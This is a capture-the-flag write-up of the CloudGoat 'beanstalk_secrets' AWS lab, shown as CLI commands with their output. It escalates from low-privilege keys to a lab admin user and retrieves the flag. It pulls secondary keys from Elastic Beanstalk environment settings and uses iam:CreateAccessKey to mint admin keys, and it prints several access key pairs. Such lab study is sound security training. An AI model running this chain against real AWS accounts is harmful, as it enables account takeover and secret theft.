Beanstalk (CloudGoat)

Beanstalk

Initial Access

# credentials
initial_low_priv_credentials = Access Key: AKIA4YM7GTDHDNB4GXV7
Secret Key: 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

# configure
aws configure --profile low_level                                                           
AWS Access Key ID [None]: AKIA4YM7GTDHDNB4GXV7
AWS Secret Access Key [None]: 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
Default region name [None]: us-east-1
Default output format [None]: json

#whoami
aws sts get-caller-identity --profile low_level   
{
    "UserId": "AIDA4YM7GTDHOLCJS5VMB",
    "Account": "877044078798",
    "Arn": "arn:aws:iam::877044078798:user/cgidg0l919nvpe_low_priv_user"
}

Enumeration

# listing attached policies
aws iam list-attached-user-policies --user-name cgidg0l919nvpe_low_priv_user --profile low_level 

An error occurred (AccessDenied) when calling the ListAttachedUserPolicies operation: User: arn:aws:iam::877044078798:user/cgidg0l919nvpe_low_priv_user is not authorized to perform: iam:ListAttachedUserPolicies on resource: user cgidg0l919nvpe_low_priv_user because no identity-based policy allows the iam:ListAttachedUserPolicies action

# listing managed policies
aws iam list-user-policies --user-name cgidg0l919nvpe_low_priv_user --profile low_level 

An error occurred (AccessDenied) when calling the ListUserPolicies operation: User: arn:aws:iam::877044078798:user/cgidg0l919nvpe_low_priv_user is not authorized to perform: iam:ListUserPolicies on resource: user cgidg0l919nvpe_low_priv_user because no identity-based policy allows the iam:ListUserPolicies action
 
 # switching to pacu
 # brute forcing permissions
Pacu (beanstalk:imported-low_level) > run iam__bruteforce_permissions 
"Permissions": {
    "Allow": [
      "ec2:DescribeSubnets",
      "dynamodb:DescribeEndpoints",
      "sts:GetSessionToken",
      "sts:GetCallerIdentity",
      "sts:GetCallerIdentity",
      "sts:GetSessionToken",
      "ec2:DescribeSubnets",
      "dynamodb:DescribeEndpoints",
      "dynamodb:DescribeEndpoints",
      "ec2:DescribeSubnets",
      "sts:GetCallerIdentity",
      "sts:GetSessionToken",
      "sts:GetCallerIdentity",
      "sts:GetSessionToken",
      "ec2:DescribeSubnets",
      "dynamodb:DescribeEndpoints"

Given the name beanstalk, we can take a logical guess and assume there is some kind AWS Elastic Beanstalk instance

What is AWS Elastic Beanstalk

• is a PaaS offering by AWS that simplifies the process, managing and scaling web applications and services

Key concepts

1. What it does:

   Elastic Beanstalk automatically handles:

   • Provisioning infrastructure (e.e., EC2, Load Balancers, Auto Scaling)

   • Deploying code in supported environments

   • Monitoring application health and metrics

   • Scaling resources based on load

2. Supported Stacks

   • Languages and frameworks: Java, .NET, Node.js, Python, PHP, Ruby, Go, and Docker

   • Application servers: Apache, Nginx, Passenger, and IIS

3. Deployment Model

   You just upload your code, and bean stalk handles

   • EC2 provisioning

   • Load balancing

   • Auto-scaling

   • Monitoring/logs via CloudWatch

Enumerating Beanstalk applications and environments

1. List all Elastic Beanstalk Applications

   aws elasticbeanstalk describe-applications --profile low_level 
   {
       "Applications": [
           {
               "ApplicationArn": "arn:aws:elasticbeanstalk:us-east-1:877044078798:application/cgidg0l919nvpe-app",
               "ApplicationName": "cgidg0l919nvpe-app",
               "Description": "Elastic Beanstalk application for insecure secrets scenario",
               "DateCreated": "2025-07-09T08:35:26.190000+00:00",
               "DateUpdated": "2025-07-09T08:35:26.190000+00:00",
               "ConfigurationTemplates": [],
               "ResourceLifecycleConfig": {
                   "VersionLifecycleConfig": {
                       "MaxCountRule": {
                           "Enabled": false,
                           "MaxCount": 200,
                           "DeleteSourceFromS3": false
                       },
                       "MaxAgeRule": {
                           "Enabled": false,
                           "MaxAgeInDays": 180,
                           "DeleteSourceFromS3": false
                       }
                   }
               }
           }
       ]
   }

   As you can see, we have found a beanstalk application, from which we can see the following

   • ApplicationArn: arn:aws:elasticbeanstalk:us-east-1:877044078798:application/cgidg0l919nvpe-app

   • ApplicationName: cgidg0l919nvpe-app

   • etc

2. We can enumerate the environment

   aws elasticbeanstalk describe-environments \
   > --application-name cgidg0l919nvpe-app \
   > --profile low_level \
   > --region us-east-1
   {
       "Environments": [
           {
               "EnvironmentName": "cgidg0l919nvpe-env",
               "EnvironmentId": "e-qdmmkwibbc",
               "ApplicationName": "cgidg0l919nvpe-app",
               "SolutionStackName": "64bit Amazon Linux 2023 v4.6.0 running Python 3.11",
               "PlatformArn": "arn:aws:elasticbeanstalk:us-east-1::platform/Python 3.11 running on 64bit Amazon Linux 2023/4.6.0",
               "EndpointURL": "awseb-e-q-AWSEBLoa-77L0EJYWIEY-1878151744.us-east-1.elb.amazonaws.com",
               "CNAME": "cgidg0l919nvpe-env.eba-usp2hym4.us-east-1.elasticbeanstalk.com",
               "DateCreated": "2025-07-09T08:35:48.437000+00:00",
               "DateUpdated": "2025-07-09T08:38:31.684000+00:00",
               "Status": "Ready",
               "AbortableOperationInProgress": false,
               "Health": "Grey",
               "HealthStatus": "No Data",
               "Tier": {
                   "Name": "WebServer",
                   "Type": "Standard",
                   "Version": "1.0"
               },
               "EnvironmentLinks": [],
               "EnvironmentArn": "arn:aws:elasticbeanstalk:us-east-1:877044078798:environment/cgidg0l919nvpe-app/cgidg0l919nvpe-env"
           }
       ]
   }

   What we are trying to look for are

   • Environment names

   • CNAMEs

   • Status, health

   • Possible public-facing endpoints or services

3. Now we want to extract configuration settings (Secrets)

   aws elasticbeanstalk describe-configuration-settings \
   --application-name cgidg0l919nvpe-app \
   --profile low_level \
   --region us-east-1 \
   --environment-name cgidg0l919nvpe-env
   

   • Output

   Ive placed the most interesting secret below

   {
                       "Namespace": "aws:elasticbeanstalk:application:environment",
                       "OptionName": "SECONDARY_ACCESS_KEY",
                       "Value": "AKIA4YM7GTDHGW25E5ZA"
                   },
                   {
                       "Namespace": "aws:elasticbeanstalk:application:environment",
                       "OptionName": "SECONDARY_SECRET_KEY",
                       "Value": "kdHPJjBtb/lbwxuXprl16prklzWqT8MlMse7bpwr"
                   }

4. We could have speed run this with pacu’s elasticbeanstalk__enum module

5. From enumerating the beanstalk environment configuration we have found some credentials material

   # configure
   aws configure --profile beanstalk                     
   AWS Access Key ID [None]: AKIA4YM7GTDHGW25E5ZA
   AWS Secret Access Key [None]: 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
   Default region name [None]: us-east-1
   Default output format [None]: json
   
   # whoami
   aws sts get-caller-identity --profile beanstalk   
   {
       "UserId": "AIDA4YM7GTDHFW7VIBRD5",
       "Account": "877044078798",
       "Arn": "arn:aws:iam::877044078798:user/cgidg0l919nvpe_secondary_user"
   }
   
   # pacu
   # after importing beanstalk creds, brute force permissions
   Pacu (beanstalk:imported-beanstalk) > run iam__bruteforce_permissions 
   

Enumerating as the secondary user

Enumerating users within the AWS account

aws iam list-users --profile beanstalk

{
  "Users": [
    {
      "Path": "/",
      "UserName": "cgidg0l919nvpe_admin_user",
      "UserId": "AIDA4YM7GTDHMRHIFUQTS",
      "Arn": "arn:aws:iam::877044078798:user/cgidg0l919nvpe_admin_user",
      "CreateDate": "2025-07-09T08:35:26+00:00"
    },
    {
      "Path": "/",
      "UserName": "cgidg0l919nvpe_low_priv_user",
      "UserId": "AIDA4YM7GTDHOLCJS5VMB",
      "Arn": "arn:aws:iam::877044078798:user/cgidg0l919nvpe_low_priv_user",
      "CreateDate": "2025-07-09T08:35:27+00:00"
    },
    {
      "Path": "/",
      "UserName": "cgidg0l919nvpe_secondary_user",
      "UserId": "AIDA4YM7GTDHFW7VIBRD5",
      "Arn": "arn:aws:iam::877044078798:user/cgidg0l919nvpe_secondary_user",
      "CreateDate": "2025-07-09T08:35:26+00:00"
    },
    {
      "Path": "/",
      "UserName": "cloudgoat",
      "UserId": "AIDA4YM7GTDHAVQ7JT75L",
      "Arn": "arn:aws:iam::877044078798:user/cloudgoat",
      "CreateDate": "2025-06-30T03:27:40+00:00"
    }
  ]
}

---

Listing attached user policies for secondary user

aws iam list-attached-user-policies --user-name cgidg0l919nvpe_secondary_user --profile beanstalk

{
  "AttachedPolicies": [
    {
      "PolicyName": "cgidg0l919nvpe_secondary_policy",
      "PolicyArn": "arn:aws:iam::877044078798:policy/cgidg0l919nvpe_secondary_policy"
    }
  ]
}

---

Viewing attached user policy metadata

aws iam get-policy --policy-arn arn:aws:iam::877044078798:policy/cgidg0l919nvpe_secondary_policy --profile beanstalk

{
  "Policy": {
    "PolicyName": "cgidg0l919nvpe_secondary_policy",
    "PolicyId": "ANPA4YM7GTDHPO75PGETD",
    "Arn": "arn:aws:iam::877044078798:policy/cgidg0l919nvpe_secondary_policy",
    "Path": "/",
    "DefaultVersionId": "v1",
    "AttachmentCount": 1,
    "PermissionsBoundaryUsageCount": 0,
    "IsAttachable": true,
    "CreateDate": "2025-07-09T08:35:26+00:00",
    "UpdateDate": "2025-07-09T08:35:26+00:00",
    "Tags": [
      {
        "Key": "Scenario",
        "Value": "beanstalk_secrets"
      },
      {
        "Key": "Stack",
        "Value": "CloudGoat"
      }
    ]
  }
}

---

Viewing the actual attached policy

aws iam get-policy-version --policy-arn arn:aws:iam::877044078798:policy/cgidg0l919nvpe_secondary_policy --version-id v1 --profile beanstalk 

{
  "PolicyVersion": {
    "Document": {
      "Statement": [
        {
          "Action": [
            "iam:CreateAccessKey"
          ],
          "Effect": "Allow",
          "Resource": "*"
        },
        {
          "Action": [
            "iam:ListRoles",
            "iam:GetRole",
            "iam:ListPolicies",
            "iam:GetPolicy",
            "iam:ListPolicyVersions",
            "iam:GetPolicyVersion",
            "iam:ListUsers",
            "iam:GetUser",
            "iam:ListGroups",
            "iam:GetGroup",
            "iam:ListAttachedUserPolicies",
            "iam:ListAttachedRolePolicies",
            "iam:GetRolePolicy"
          ],
          "Effect": "Allow",
          "Resource": "*"
        }
      ],
      "Version": "2012-10-17"
    },
    "VersionId": "v1",
    "IsDefaultVersion": true,
    "CreateDate": "2025-07-09T08:35:26+00:00"
  }
}

If we look at the following

 {
                    "Action": [
                        "iam:CreateAccessKey"
                    ],
                    "Effect": "Allow",
                    "Resource": "*"

This alows the creation of new access keys for any IAM user

Privilege esc to Admin User

1. From this we can create a new access key for the administrative user

   aws iam create-access-key --user-name cgidg0l919nvpe_admin_user --profile beanstalk                                                         
   {
       "AccessKey": {
           "UserName": "cgidg0l919nvpe_admin_user",
           "AccessKeyId": "AKIA4YM7GTDHFFR5Y26E",
           "Status": "Active",
           "SecretAccessKey": "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",
           "CreateDate": "2025-07-09T09:56:39+00:00"
       }
   }

2. We can now assume the admin

   aws configure --profile beanstalk_admin                                            
   AWS Access Key ID [None]: AKIA4YM7GTDHFFR5Y26E
   AWS Secret Access Key [None]: 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
   Default region name [None]: us-east-1
   Default output format [None]: json
   
   #whoami
   aws sts get-caller-identity --profile beanstalk_admin 
   {
       "UserId": "AIDA4YM7GTDHMRHIFUQTS",
       "Account": "877044078798",
       "Arn": "arn:aws:iam::877044078798:user/cgidg0l919nvpe_admin_user"
   }

3. Now we can retrieve the final glab from the AWS secret manager

   # Listing secrets in secret manager
   aws secretsmanager list-secrets --profile beanstalk_admin 
   {
       "SecretList": [
           {
               "ARN": "arn:aws:secretsmanager:us-east-1:877044078798:secret:cgidg0l919nvpe_final_flag-ht4jbx",
               "Name": "cgidg0l919nvpe_final_flag",
               "LastChangedDate": "2025-07-09T18:35:28.773000+10:00",
               "LastAccessedDate": "2025-07-09T10:00:00+10:00",
               "Tags": [
                   {
                       "Key": "Stack",
                       "Value": "CloudGoat"
                   },
                   {
                       "Key": "Scenario",
                       "Value": "beanstalk_secrets"
                   }
               ],
               "SecretVersionsToStages": {
                   "terraform-20250709083527730700000002": [
                       "AWSCURRENT"
                   ]
               },
               "CreatedDate": "2025-07-09T18:35:25.827000+10:00"
           }
       ]
   }
   
   # retrieving the flag
   aws secretsmanager get-secret-value --secret-id cgidg0l919nvpe_final_flag --profile beanstalk_admin 
   {
       "ARN": "arn:aws:secretsmanager:us-east-1:877044078798:secret:cgidg0l919nvpe_final_flag-ht4jbx",
       "Name": "cgidg0l919nvpe_final_flag",
       "VersionId": "terraform-20250709083527730700000002",
       "SecretString": "FLAG{D0nt_st0r3_s3cr3ts_in_b3@nsta1k!}",
       "VersionStages": [
           "AWSCURRENT"
       ],
       "CreatedDate": "2025-07-09T18:35:28.768000+10:00"
   }